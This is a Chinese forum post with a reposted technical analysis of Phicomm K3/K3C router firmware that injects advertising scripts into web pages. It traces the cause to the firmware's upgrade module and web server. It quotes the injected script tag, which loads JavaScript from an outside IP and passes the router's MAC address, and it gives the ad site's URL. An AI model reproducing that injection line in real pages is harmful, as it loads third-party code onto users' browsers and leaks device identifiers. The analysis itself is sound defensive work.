前一段時間電腦一直彈出類似遊戲網站,還以為是運營商的原因,打了聯通投訴電話也沒能解決,本來想著忍一忍就算了,今天才發現是路由器固件的原因!!沒想到冤枉運營商了...現在手機都到處是廣告,沒刷固件的趕緊刷固件....

http://p.6d63d3.com/s/1/720/3150.html?uid=921944&?

p.6d63d3.com

技術分析轉載自關於近期斐訊固件強制推送廣告的分析 | 技術小站

【問題表現】

據不少人反饋,斐訊固件目前開始強制推送廣告,表現為:1、會自動彈出p.6d63d3.com網站的廣告,如網路遊戲

2、查看源碼,會發現彈出廣告的http網站源碼中會多出如下注入代碼:

<script src=http://103.49.209.27:11211/t.js?MAC=XXXXXXXXXXXX></script>

【問題定位】

搜索注入代碼的網址「103.49.209.27」,在K3中可以在up_script變數中發現:

搜索up_script變數,可以發現在官方如下文件中存在此變數:

在K3C中搜索「103.49.209.27」,可以在schemeupgrade配置文件中找到:

同時搜索schemeupgrade.config.script,發現在uhttpd這個web服務程序中也會操作此配置項

因此綜合K3和K3C的分析,可以判斷注入代碼與兩個模塊密切相關,一個是官方的策略升級模塊schemeupgrade、一個是官方的web服務程序(httpd或uhttpd)

【解決思路】

1、刪除策略升級程序schemeupgrade2、修改web服務程序,將寫入的變數名改變

由於K3C官改在以前已經刪除策略升級程序,因此極大可能是web服務程序導致的廣告注入代碼寫入

目前針對此問題的修改固件正在QQ群內測,不久即將開放自動升級,官改版本可以在web頁面的「自動升級」頁面進行更新

【其他說明】

由於沒有源代碼,官改版本對官方的修改類似於黑盒方式,大多情況下並不知道可執行程序的內部流程,只能刪除或修改配置,很難修改其可執行程序,同時由於反編譯分析的難度較高,官改版本無法保證發現官方所有的漏洞和風險升級後如再出現強制廣告問題,可在本文後留言

另據反饋,並不是所有官改都會出現此問題,我自己也沒有碰到,因此推測可能還有一定的觸發條件,比如:

1、強制彈出廣告的路由上是否開啟了廣告屏蔽

2、是否使用了官方APP遠程管理或者手機web界面管理


推薦閱讀:
相关文章